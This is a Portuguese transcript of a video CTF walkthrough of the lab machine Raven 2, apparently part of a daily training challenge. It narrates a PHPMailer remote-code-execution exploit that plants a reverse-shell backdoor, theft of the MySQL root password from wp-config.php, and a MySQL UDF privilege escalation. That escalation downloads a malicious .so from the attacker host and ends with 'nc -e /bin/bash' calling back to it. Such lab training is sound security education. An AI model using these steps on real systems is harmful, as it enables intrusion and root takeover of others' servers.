Fala pessoal, beleza? Vamos começar a nossa 13ª máquina aqui, a Riven 2. Essa máquina é uma máquina bem divertida, então foi bem fácil de subir ela aí, já é um OVA, então sobe bem tranquilinho no VirtualBox. A primeira exploração que a gente vai fazer nessa máquina aqui é uma biblioteca de terceiros que chama PHP Mailer. A gente vai fazer um RCE nesse PHP Mailer, daqui a pouco eu explico mais aí do exploit para vocês. E após a exploração dessa máquina, a gente vai explorar um MySQL que está rodando como root na máquina, então a gente vai explorar ele. Daqui a pouco eu volto aqui para explicar para vocês aí com relação aos links aí da referência. Então a primeira coisa que a gente faria aqui era escanear essa máquina, né? Sudo nmap "-szinho vzão "-v para ver a versão do serviço em modo verboso 192.168.2.31, que é o IP que ela pegou aqui na minha infra, né? Aí você tem que ver o IP que ela pegou aí na sua. Então já logo de cara a gente vê que está rodando aqui uma porta 80, 22 e a 111, né? Então é um Apache na 2410 e um OpenSSH 67, um RPC Bind. Então de cara a gente já não vê nada que talvez a gente possa explorar aqui, então a gente vai bater ela aqui no browser. Deixa eu abrir o browser aqui. Então você pode acessar aqui o 92.68.2.31. Então a gente vê aqui que é um site institucional, né? Se você der um view page search aqui, a gente não está vendo nenhuma referência de plugin ou coisa do tipo, tema, coisa do tipo que mostre que isso aqui é um CMS, então provavelmente é uma página que foi desenvolvida mesmo, né? Então a gente viu que tem uma tela de login aqui, mas a gente pode enumerar esse cara, a gente pode usar o dirb, a gente já utilizou ele antes, né? http://192.168.2.31 -d para passar o word list, para o -sr share word lists dirb /big para pegar o word list grande que tem aqui, deixa ele rodando aqui. Então, essa enumeração, basicamente, ele sai fazendo uma requisição, dá um request na página lá, utilizando uma word list para enumerar diretórios aqui, né? Então, os primeiros diretórios que ele numerou aqui, ele já mostra, né, que tem alguns diretórios rodando aqui. A gente pode ver que tem até um WordPress rodando lá. Mas o que interessa para a gente nesse primeiro momento é esse diretório aqui, ó, /vendor. Então, se a gente vier aqui na aplicação e acessar o /vendor aqui, já a gente encontra a primeira vulnerabilidade dessa máquina, né, que está com o index off habilitado aqui. Isso permite a gente conseguir ver aqui, ó, que está rodando um PHP mailer dentro desse diretório. Então, se você procurar aqui no Kali, search, opa, deixa eu parar aqui, search exploit PHP mailer, você vai ver que tem alguns exploits para PHP mailer, né? Tem um exploit aqui de RCE. Então, se a gente copiar esse exploit para cá, esse de Python aqui, os outros são o mesmo exploit, só que em outra linguagem. Se você der um search exploit aqui, -m e o nome do exploit, ele copia o exploit para o diretório que você está. Então, não sabia disso também, eu copiava sempre na mão o exploit. O parâmetro "-m" ele faz ele copiar o exploit para cá. Então, se a gente abrir esse exploit aqui, a gente consegue ver aqui mais ou menos o que ele faz, né? Eu vou abrir aqui no browser para ficar mais fácil de mostrar para vocês, tá? Mas é o mesmo exploit, tá? Então, a primeira coisa aqui nesse exploit é que ele utiliza a biblioteca request_toolbelt e o LXML, que não são bibliotecas default do Python. Então, você vai precisar usar o pip aí para instalar essas dependências para funcionar esse script aqui. Então, a primeira coisa que ele passa aqui é o target, né, onde ele vai fazer a requisição. Você pode ver aqui na função, aqui no começo aqui, que ele manda um request para esse target aqui, e nesse request ele insere esse backdoor.php que ele vai criar aqui, né, que ele criou criou uma variável aqui chamada backdoor.php. Então ele, dentro dessa requisição, ele criou um payload aqui. Esse payload é aquele do Pentest Monkey que a gente já usou ontem aqui, não sei se foi ontem ou se foi anteontem. Mas é o mesmo payload, a diferença é que ele botou um PHP System para chamar ele na web e aí dentro do sistema ele roda um Python em linha de comando aqui e manda uma conexão via socket, né, para aqui para esse endereço IP e essa porta. Então, como parâmetro aqui, ele dá um submit num form, que é o form do PHP Mailer. Então ele faz a injeção do payload, ele faz no nome do cara que está mandando o e-mail, e aqui dentro do e-mail ele faz mais uma injeção para copiar esse arquivo para dentro do diretório raiz do server.
Então ele usa aqui o multipart para encodar isso, né, e mandar essa requisição. Aqui ele passa o user agent, se você quiser alterar esse cara aqui para um user agent de um browser para ficar mais stealth, né, mas aqui no CTF não precisa. Então ele utiliza os proxies aqui, se caso tenha proxy configurado aí. E aqui depois ele faz a requisição, então, né, lá no target. A primeira coisa que a gente precisa saber, então, é aonde está o PHP mailer para a gente conseguir fazer esse submit. Porque se a gente mandar direto na raiz do server, ele não vai achar o PHP mailer, ele não vai fazer o submit. Então, se você vier aqui na aplicação, deixa eu tirar o view source aqui, e vier aqui em contato, ó, no contato ele tem a opção de mandar o e-mail. Aqui pelo browser você não vai conseguir fazer a exploração porque ele tem um validator no front-end, só que ele não tem um validator no back-end. Então se você der um view page source aqui, deixa eu ver qual linha que tá. Aqui na 66, ó, faz referência aqui ao contact.php. Então se abrir esse cara aqui, ó, essa é a nossa URL de alvo, porque é no arquivo contact.php que ele faz o submit, né, do envio do e-mail. Então aqui dentro do target a gente vai colocar o nosso target, né? É o contact.php. Aqui eu vou trocar o nome dessa backdoor aqui e vou colocar file 002, no 003.php. Pode pôr o nome que você quiser. Aqui no payload a gente precisa mudar o endereço IP, né, para ele não se conectar no limbo aqui. Vamos colocar o endereço IP do nosso Kali. No meu caso aqui é o 9268.2.5. No IP4, na porta 443, como sempre. Então aqui a gente vai deixar como tá, né, o submit, o payload. Se você quiser mudar o e-mail, você pode mudar, eu não vou mudar. A única coisa que a gente precisa mudar aqui é o patch raiz aqui da aplicação. Como é que a gente vai descobrir isso? Aqui dentro da pasta vendor, ó, tem um arquivo chamado path, que você abre, ele tem uma variável de ambiente aqui que mostra qual que é o diretório raiz do servidor, que é do Apache, né, o var www.html, não foi alterado. Então você pode vir aqui, né, nesse arquivo aqui, né, do exploit, e inserir o diretório correto do servidor aqui e inserir o nome do payload que a gente modificou aqui, ó, que eu estava como backdoor, a gente modificou para file 003.php. Então o resto não precisa alterar, só se você quiser. Então agora a gente pode executar esse cara. Só tem um problema, né? Quando a gente executar esse payload, ele vai dar um erro aqui, ó. Então é um erro de decoding aqui, um erro de encoding, né? Que não está declarado aqui dentro do código qual que é o tipo de encoding que ele vai utilizar. A maior parte dos exploits públicos aí você precisa arrumar ele, que o desenvolvedor faz isso para justamente quem não sabe nem ler uma saída de erro aqui não sair rodando exploit, né? Então se você já programou em Python, você sabe que para corrigir esse problema é só você colocar um header aqui dentro da, do código, né, referenciando o encoding. Opa, coding com o TF8 ou outro tipo de codificação, TF8, porque daí ele vai conseguir, porque tem caracteres especiais aqui dentro do script, então como sem a referência ali do qual encoding ele vai utilizar, né, ele não vai funcionar. Então agora se a gente rodar esse cara aqui, ele já rodou e já está dizendo aqui, né, que foi exploitado. Então dentro do diretório 231/contact.php aqui, ele conseguiu inserir, né, o nosso exploit lá que a gente chamou de file 003.php. Então agora a gente precisa startar aqui o nosso handler sudo netcat-nlvp na porta 443. Ele está escutando aqui. A gente pode vir aqui na nossa aplicação agora. Deixa eu minimizar esse aqui, voltar na outra janela aqui. Deixa eu fechar esses caras. E a gente chamar aqui então file 003.php. Repare aqui atrás que a gente abriu então a nossa sessão, né, com o nosso usuário www.data. Eu vou spawnar uma shell aqui, python -c import pty para importar o pty, pty.spawn, que é a função que vai chamar o /bin/bash. Beleza. Então agora que a gente já está aqui dentro desse server, né, a
a gente precisa então procurar algum vetor aí para uma pós-exploração, né? Existem várias técnicas para se buscar informações dentro do servidor sobre como você pode pós-explorá-lo, né? Uma delas é você ver os recursos que estão rodando como root, aí, processos que estão rodando como root. Então, se você mandar aqui um ps-al x pipe grep root, ele vai filtrar, né, todos os processos que estão rodando como root. E você pode ver aqui, ó, que ele está rodando MySQL com o usuário root. Isso é uma vulnerabilidade, porque se você explorar o MySQL, você consegue acesso de root do servidor, né? Então, se você procurar por exploit para MySQL, você vai achar uma porrada de exploit. Só que o que a gente tem que procurar aqui não é só exploit para MySQL, é exploração de MySQL rodando como root. Então você vai acabar caindo, né, aqui dentro desse exploit. O que esse exploit faz? Como o próprio desenvolvedor diz aqui, que é uma ideia realmente ruim você é, rodar um MySQL como root, né, com privilégio de root. Então a exploração que ele faz aqui é criar uma DLL, não, DLL não porque é no Linux, né, criar uma biblioteca aí, maliciosa, né, um arquivo SO malicioso, para inserir ele dentro do contexto do MySQL ali e rodar como root. Um arquivo SO, para quem não sabe o que é, né, ele é uma biblioteca de sistema. Então, igual a DLL do Windows lá, o SO é uma biblioteca de sistema dentro do Linux. Então, quando o desenvolvedor cria lá a aplicação dele, ele não vai codificar todos os recursos que a aplicação vai realmente usufruir, né, ou até mesmo executar, né? Ele pode chamar esses recursos utilizando bibliotecas compartilhadas do sistema. Então, aqui no Linux, né, dentro de usr-lib, você tem as libs de sistema aqui do Linux, que elas são compartilhadas entre as aplicações que rodam dentro do Linux. Então, o que a gente vai fazer, né, nesse exploit é criar uma lib maliciosa, né, e utilizar uma MySQL para inserir ela dentro do /sr/lib aqui e executar ela dentro do MySQL ali, para poder abrir a nossa sessão como root. A gente vai utilizar o GCC para compilar o exploit ali. Eu vou deixar esse link aqui para vocês poderem entender o que, que é os links simbólicos ali que a gente vai criar, o que, que é a gente fazer a pré-compilação, depois a compilação. Dê uma lida nisso aqui quem nunca tiver mexido com esse tema, tá? Então aqui no exploit, só para explicar para vocês, ó, primeiro ele faz a compilação, a pré-compilação do exploit. Então a gente já vai fazer isso na prática aqui. Depois ele cria uma lib SO e faz o link entre o SO e aquele binário pré-compilado ali do exploit. Então é necessário ter a senha de root do MySQL. Como é que a gente vai conseguir essa senha, né? A gente chegou aqui na aplicação, então a gente já está dentro do diretório da aplicação e tem um WordPress rodando aqui. Então, se a gente entrar aqui no WordPress, dentro do WordPress, no arquivo wp.config, tem hardcoded a senha de acesso do banco. Então, a gente pode dar um cat nela aqui, wp-config.php. Tá hardcoded aqui a senha, né, default estar hardcoded a senha do MySQL, do banco que o cara estiver utilizando aqui dentro do WordPress. Então aqui a gente deu a sorte do cara estar rodando como root, né, o banco, e a senha é essa aqui, ó. Então agora se a gente der um MySQL aqui, -u de usuário root, -p de password, e essa senha aqui a gente conseguiu se logar então aqui dentro do MySQL como root. Então a gente já conseguiu cumprir, né, a primeira parte aqui do exploit, que é se conectar como root, né, no MySQL. Então agora antes da gente fazer os procedimentos aqui dentro do MySQL, a gente precisa compilar esse exploit. Aqui o exploit DBID é 1518, para a gente poder usar a referência para copiar o exploit aqui dentro do Kali. Então eu vou abrir uma janelinha nova aqui. Se a gente der um search exploit aqui 1518, opa, a gente consegue ver aqui o exploit do MySQL aqui, ó. Então, se você copiar aqui o nome dele, ao invés de fazer aquele rolê de procurar e aí copiar o arquivo, você pode dar um search exploit "-m" e o nome do exploit, que ele vai, que ele vai copiar para o diretório onde você está o exploit, ó. Então ele já copiou aqui, né, o 1518.c.
Então eu vou só mover ele aqui, mv1518.c para arquivo 1.c, para mudar o nome dele, né? Beleza, então ele está aqui, a gente tem que, então o que que a gente vai fazer, né? Segundo os passos aqui que o próprio autor do exploit deixou para a gente tem que primeiro, ao invés de compilar o exploit completamente, a gente vai pré-compilar ele com essas duas flags aqui, o "-g" e "-c". Por que que a gente vai pré-compilar esse cara? Para criar um binário aqui, para a gente poder linkar ele com a lib. Então eu vou dar um gcc "-g", "-c", arquivo 1.c. Então agora você vai ver que ele criou aqui ó, o arquivo 1.o, que é um arquivo binário que ainda não está compilado, ele está pré-compilado, né? Então agora a gente precisa criar o soname ali para conseguir juntar as duas coisas, né? A biblioteca maliciosa com o binário aqui do arquivo.o. Você vai dar um gcc "-g", "-shared" para chamar as bibliotecas compartilhadas do Linux, "-wl", vírgula, "-soname". Da mesma forma que está escrito aqui, tá? No exploit, ó. Você pode seguir isso aqui. Aqui, depois do "-soname", você vai passar o nome da lib que você vai criar, que eu vou chamar ela aqui de MySQL, sei lá, MySQL 7b, só para ficar diferente. MySQL 7b, só para ficar mais, sei lá, parece que realmente é alguma coisa. MySQL 7b.so. Então você vai dar um "-o" de output aqui para ele sair. Vou pôr o mesmo nome, MySQL. Você pode pôr o nome que você quiser, tá? 7b maiúsculo.so. E eu vou linkar ela com o arquivo 1.o, utilizando, arquivo 1.o, utilizando o parâmetro "-lc". Então aqui a gente conseguiu criar a nossa lib aqui, MySQL 7b.so, né? Então você vendo meio por cima assim, você vai achar que realmente é de verdade, né? Inclusive o cara que sobe o MySQL como root vai achar que isso aqui é uma lib de sistema mesmo. Então agora a gente precisa jogar essa lib lá para dentro do server. Então eu vou subir um simple server aqui, python "-m simple http server da porta 8080. Agora a gente, aqui dentro do alvo, né, se você der um barra invertida, exclamação SH aqui dentro do MySQL, ele vai abrir a shell aqui. Então eu vou lá no /tmp e vou dar um wget http // 192.68.2.5 na porta 8080, que é o IP do meu Kali, né? /mysql 7 é B ou D, não lembro. 7b de bola .so. Olha, já baixou aqui a lib, então eu já posso dar um exit aqui. Aqui posso parar meu simple server também. Então agora a gente vai fazer o processo aqui dentro, né, do MySQL. Então a primeira coisa que a gente vai fazer é utilizar o contexto do MySQL, a database do MySQL. Então use MySQL. Beleza, então agora a gente vai criar uma tabela num campo no formato blob, né? O que que é um campo no formato blob? O blob ele é um formato de campo que você consegue salvar binários aí dentro dele, né? Deixa eu até colocar aqui para pôr no link de referência para vocês. O, então o blob ele é um campo aí onde você consegue inserir, né, arquivos binários dentro do MySQL. Depois que a gente criar esse campo blob, deixa eu fechar aqui. Aqui como ele mostra aqui pra gente no exploit, ó, ele vai dar um create table, né, vai chamar a tabela de full aqui e vai usar o parâmetro line espaço blob aqui para passar o formato desse campo como blob. Então create table, eu vou chamar de AA minha tabela aqui. Opa, e vamos passar como tipo dela aqui line blob. Então, opa, acho que eu escrevi errado aqui. Create table que eu escrevi create, escrevi errado. Create table AA do tipo line blob. Opa, já criei essa tabela. Create table bb
do tipo line blob. Beleza, então ele criou aqui a nossa tabela BB, né? Aqui o cara do desenvolvedor aqui chamou ela de full, a gente só mudou o nome aqui. Então a gente vai inserir no BB, né, dentro da tabela que a gente criou, né, um arquivo. Ele vai utilizar a função load file, que é essa função do MySQL aqui, ó, cadê? Que permite que você insira arquivos dentro do teu campo blob ali. Né? A gente vai utilizar então o parâmetro load file para poder passar o caminho dentro do servidor aonde está salvo a nossa lib SO, né? Então a gente vai fazer aqui um insert into bb, que é o nome da tabela que eu criei aqui, values para passar quais são os valores aí, né, os dados que a gente vai passar, a gente vai utilizar a função load underline file para passar o arquivo onde ele está, que a gente salvou em /tmp /mysql 7b maiúsculo .so. Fecho aspas aqui, fecha a função. Beleza, a gente inseriu então isso dentro dos valores ali. Então agora a gente vai dar um select dentro dessa tabela e a gente vai usar um parâmetro chamado dump file para salvar essa saída dentro de um arquivo, né, dentro do server. Então lembrando que em /usr/lib é onde ficam as libs aqui do Linux. Então a gente vai salvar essa lib nossa lá. Lembrando que esse MySQL está rodando como root, então onde a gente quiser salvar a gente vai conseguir. Então vou dar um select asterisco from bb, que é o nome da tabela que a gente criou, né, into dump file, para salvar essa saída dentro de um arquivo em /usr /lib /mysql 7b.so. Deixa eu copiar esse cara aqui. Beleza, ele conseguiu inserir ali o nosso arquivo, né, dentro do srlib. Então agora a gente pode criar uma função para dentro dessa função a gente chamar, né, esse soname aí, chamar esse arquivo que está dentro do contexto do sistema agora. Então vou dar um create function para criar uma função, né, function para criar uma função aqui, né? Então até está nos links aqui para vocês o que é uma função dentro do MySQL, né? É realmente uma função, ela vai executar alguma coisa como uma linguagem de programação. Então uma função, né, para ela ser uma função, ela precisa ter um retorno, né? Ela precisa retornar alguma coisa. Então a gente vai dar um returns no formato integer, o soname. E onde que a gente vai chamar esse soname? Dentro do contexto aí do MySQL, onde está o srlib. Então a gente pode chamar direto aqui o MySQL 7b que a gente criou, .so, e chamar ele aqui, create function returns integer soname. Olha, ele deu um erro aqui. Opa, é que eu não botei o nome da função, né? Aí ele não vai funcionar, né, cabeção? Create function tem que pôr um nome nessa função, né? A gente vai chamar de doSystem, igual o criador do exploit criou ali, gostei desse nome. Create function doSystem e ela vai retornar, né, um integer soname e o nome da lib que a gente criou. Beleza, aqui tá dando que já existe essa função doSystem porque eu criei ela já hoje. Create batata. Opa. Create function batata returns integer soname. Tá, não deixou eu criar outra aqui, mas já está criada a função do system. Para vocês aí de primeira vai criar a função. Aqui eu já tinha feito exploração da máquina, já tinha criado com esse nome, eu tinha esquecido. Mas vamos lá. Então agora se você der um select asterisco from mysql.func, que é onde ficam aqui as funções no contexto do MySQL, você vai ver que foi criada aqui a função do system,
E o que ela executa aqui, eu tinha criado antes o MySQL AA.so, a gente subiu aqui o MySQL 7b.so. Para você vai estar aparecendo o que você acabou de criar aí, tá? É que eu já tinha feito exploração dessa máquina. Aí vamos seguir dessa forma mesmo, só para não perder tempo aqui. Então, agora que a gente viu que está criada essa função, a gente só precisa então chamar essa função e passar um parâmetro para ela. Então eu vou dar um select aqui nessa função, ó, select asterisco, né? Opa, desculpa, select do underline system, que é o nome dela aqui, ó. E agora, como parâmetro para esse do system que a gente está chamando, a gente vai passar então algum comando lá no Linux, que eu vou dar aqui um nc nc 192.1 netcat, né, 192.68.2.5, que é o IP do meu Kali, na porta 80, que eu vou abrir o handler aqui agora. Vou dar um "-e" para executar o barra bin barra bash. Então, quando a gente executar essa função, ele vai executar como root o netcat lá para o meu Kali na porta 80 e vai mandar o barra bin barra bash para lá. Então aqui a gente vai executar aqui o nc, né? nc-nlvp na porta 80, nlvp para ficar escutando em modo verboso, tem que dar um sudo aqui por causa da porta 80. Agora ele está escutando aqui, eu vou executar a função, eu executei a função e ele recebeu aqui então a conexão como root. Então a gente fez aí a exploração da máquina, né? Porque o MySQL estava instalado aí com permissão de root. Então o grande erro aqui nessa máquina, né, foi, além do PHP mailer lá, foi o cara tá rodando o MySQL como root. Foi assim que a gente escalonou o privilégio, beleza? Então todos esses links que eu passei para vocês aqui das explicações sobre né, como compilar aqui com o GCC, o que é uma libso, né, como funciona aqui a compilação dentro do GCC e o link entre o SO e o binário que a gente pré-compilou, tá tudo aqui na descrição, tá? Se vocês precisarem de alguma coisa, manda lá no grupo. Aqui embaixo também na descrição tá o link da VM de amanhã, tá? E quem não se inscreveu ainda no canal, se inscreve aqui para dar uma força pra gente, tá? E lembre que se você está participando do desafio e não estiver inscrito aqui no canal, você não vai receber o certificado no final, tá? Tem gente perguntando sobre o Cherry Tree. Não necessariamente precisa ser com o Cherry Tree para vocês me mandarem a evidência de todas as máquinas no final, mas salvem os prints aí dentro de um arquivo só e me mandem só um arquivo em PDF no final, beleza? Porque imagine que eu vou ter que ler esse arquivo de todo mundo, né? Então, e a gente ainda vai conferir se a pessoa está inscrita no canal aqui. Então, coloquem tudo num arquivo só, beleza? Obrigado aí pela presença de vocês e até amanhã, pessoal. Falou!